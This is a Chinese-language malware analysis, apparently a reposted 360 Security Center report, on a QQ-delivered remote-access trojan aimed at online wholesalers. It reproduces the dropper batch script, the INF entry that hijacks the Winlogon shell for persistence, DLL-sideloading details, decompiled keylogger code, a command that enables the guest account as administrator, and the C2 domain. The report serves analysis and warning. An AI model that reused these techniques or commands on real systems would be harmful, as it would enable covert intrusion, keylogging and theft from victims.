分享一篇有关互联网,手机方面文章给大家,相信很多小伙伴们还是对互联网,手机这方面还是不太了解,那么小编也在网上收集到了一些关于手机和互联网这方面的相关知识来分享给大家,希望大家看了会喜欢。
前言
近日,360安全中心监测到有不法分子通过添加QQ好友的形式,以沟通商品交易的名义发送名为“这几天团队的量”的文件,一旦接收并打开文件,电脑将被远程控制,不法分子可进一步盗取隐私及财物、甚至植入病毒实现敲诈勒索等操作。
360安全中心对该样本进行分析发现,“这几天团队的量.rar”是一个将木马打包在其中的压缩包文件,投递目标主要是网络批发商。牧马人通过将木马伪装成数量详情图片文件,在与商家沟通的期间,发送木马文件给商家,引诱商家中招。
当网店批发商在接受到文件后,解压出文件夹并点击了文件夹中的“宝贝批发数量.com”后,木马就会在后台偷偷跑起来。
图0:解压后文件夹内容
文件夹结构
┌─ 宝贝批发数量.com
│
├─ setup.ini
│
└─ Data
├─ 2018.jpg
│
├─ 360666
│ ├─ 360666.PNG
│ ├─ date
│ ├─ QQAPP.exe
│ ├─ Readme.txt
│ ├─ TEMA
│ ├─ WPS_office2016.lnk
│ └─ WPS_office2017.lnk
│
└─ Order
├─ m.exe
├─ WoodTorch.exe
└─ WPS.JPG
分析
宝贝批发数量.com
该文件其实为白文件,它带有艾威梯科技(北京)有限公司数字签名。
图1:白文件 签名信息
程序在执行起来后会读取同目录下的setup.ini文件,根据配置文件中Install项里的CmdLine执行命令。而文件常规打开是一堆乱码,在十六进制试图下可以清楚看到Cmdline命令。
图2:记事本浏览视图
图3:十六进制浏览视图
Cmdline命令如下:
[Install]
CmdLine=DataOrderWoodTorch.exe execmd DataOrderm.exe /c DataOrderm.exe `< DataOrderWPS.JPG
WoodTorch.exe
被宝贝批发数量.com加载起来的WoodTorch.exe,实质上是命令行工具Nircmd。而上述的命令语句则是通过execmd这个执行命令指示符,在不显示任何信息至屏幕的情况下执行下面的语句:
DataOrderm.exe /c DataOrderm.exe `< DataOrderWPS.JPG
m.exe
系统的cmd程序,它的作用是用于加载WPS.JPG这个批处理文件。
WPS.JPG
从文件名上来看它是一个图片,但内容为批处理脚本。内容如下:
图4:WPS.JPG
@echo off
cmd.exe /c start data2018.jpg
md c:microsoft
copy Data360666Readme.txt c:microsoftReadme.txt
copy Data360666date c:microsoftdate
copy Data360666360666.PNG c:microsoft360666.PNG
copy Data360666QQAPP.exe c:microsoftQQAPP.exe
copy /b Data360666TEMA+ Data360666WPS_office2016.lnk+Data360666WPS_office2017.lnk c:microsoftcommon.dll
start C:MicrosoftQQApp.exe
start c:windowssystem32 undll32.exe advpack.dll,LaunchINFSection c:microsoft360666.png,DefaultInstall
pause
行为分析:
1. 打开Data目录下的2018.jpg图片
2. 创建目录 c:microsoft目录
3. 拷贝Data360666目录下的Readme.txt、date、360666.PNG、QQAPP.exe到c:microsoft目录中
4. 合并Data360666目录下的TEMA、WPS_office2016.lnk、WPS_office2017.lnk为c:microsoft目录下common.dll
5. 执行C:MicrosoftQQApp.exe
6. 执行c:windowssystem32 undll32.exe advpack.dll,LaunchINFSection c:microsoft360666.png,DefaultInstall
步骤1的目的是为了让批发商觉得自己真的是打开了一张图片
图5:数量图
步骤2-5为白加黑木马部分
QQAPP.exe是带有腾讯签名的白文件,由于QQAPP.exe在调用Common.dll时,没有对Common.dll进行校验。牧马人通过将恶意文件拆分成TEMA、WPS_office2016.lnk、WPS_office2017.lnk三个文件,在程序执行过程中合并成common.dll。当QQAPP.exe执行的时候,恶意的common.dll就会被自动加载,从而执行恶意代码。
l 步骤6的目的是通过360666.png中的配置信息让QQAPP.exe能够在重启后自启动,达到木马驻留受害者电脑的目的。
[Version]
Signature="$Windows NT$"
[Defaultinstall]
addREG=Gc
[Gc]
HKCU,"SoftwareMicrosoftWindows NTCurrentVersionWinlogon","shell","0x00000000","Explorer.exe,C:MicrosoftQQApp.exe"
common.dll
InitBugReport :
a. 通过访问www[.]baidu[.]com测试网络连通性,如果访问失败则ExitProcess。
图6:测试网络连通性
b. 导出函数为空,伪造源文件导出函数SetBugReportUin、ValidateBugReport。
void __cdecl TXBugReport::SetBugReportUin()
{
sub_10001F44();
}
void sub_10001F44()
{
;
}
void __cdecl TXBugReport::ValidateBugReport()
{
sub_10001F4B();
}
void sub_10001F4B()
{
;
}
c. 解密Readme.txt,解密后的Readme_dump文件为PeLoad。它负责读取解密同目录下的date文件,并创建新的线程执行解密后的date。
图7:创建线程
Readme_dump(解密后的Readme.txt)
a. 干扰函数
void Sleeps()
{
Sleep(0);
Sleep(0);
Sleep(0);
Sleep(0);
Sleep(0);
Sleep(0);
Sleep(0);
Sleep(0);
Sleep(0);
Sleep(0);
Sleep(0);
Sleep(0);
Sleep(0);
Sleep(0);
Sleep(0);
Sleep(0);
Sleep(0);
Sleep(0);
Sleep(0);
Sleep(0);
}
b. 解密date文件。
图8:解密算法
c. 读取解密同目录下的date文件,并创建新的线程执行解密后的date。
图9:加载木马
木马主体(解密后的date)
a. 判断C:ProgramDataMicrosoftWindowsStart MenuTorchwood.lnk文件是否存在,存在则删除文件。
b. 通过加密字符串T1hEVVFMWFNEVhVfVlsr解密出CC。
图10:解密CC地址
c. 网络通讯
图11:连接CC
d. 键盘记录,通过异或0x62加密后保存到C:Windowssystem32ForShare.key。
while ( 1 )
{
v2 = GetKeyState(16); // 获取shift键状态
v3 = dword_BCEAF4[v8 / 4];
if ( ((unsigned __int16)GetAsyncKeyState(dword_BCEAF4[v8 / 4]) >> 8) & 0x80 ) // 获取指定按键状态
{
if ( GetKeyState(20) && v2 > -1 && v3 > 64 && v3 < 93 )
{
*(&v5 + v3) = 1;
}
else
{
if ( !GetKeyState(20) )
goto LABEL_38;
if ( v2 >= 0 )
goto LABEL_22;
if ( v3 > 64 && v3 < 93 )
{
*(&v5 + v3) = 2;
}
else
{
LABEL_38:
if ( v2 >= 0 )
{
LABEL_22:
*(&v5 + v3) = 4;
goto LABEL_34;
}
*(&v5 + v3) = 3;
}
图12:保存键盘记录
e. 清除事件日志
图13:清除事件日志
f. 遍历进程,检测杀软
图14:杀软字符串
图15:遍历进程
g.设置guest 密码,并添加到管理员组。
net user guest /active:yes && net user guest 123456 && net localgroup administrators guest /add
h. 其余功能主要还有文件管理、注册表管理、进程管理、shell操作、下载文件、更新客户端、卸载客户端等
追溯
根据CC地址duanjiuhao.top的域名信息获取到了域名持有者的姓名、邮箱、手机号。
图16:whois信息
最后
年关将近,不法分子试图利用这些“白加黑”远控木马从中招用户那“谋财”。目前,360安全卫士已经对该类木马进行防御及查杀,在此也提醒网民,提防来历不明的文件、链接,同时开启安全软件,临近新年,为自己的隐私及财产安全加上一把锁。
特别提醒:本网内容转载自其他媒体,目的在于传递更多信息,并不代表本网赞同其观点。其原创性以及文中陈述文字和内容未经本站证实,对本文以及其中全部或者部分内容、文字的真实性、完整性、及时性本站不作任何保证或承诺,并请自行核实相关内容。本站不承担此类作品侵权行为的直接责任及连带责任。如若本网有任何内容侵犯您的权益,请及时联系我们,本站将会在24小时内处理完毕。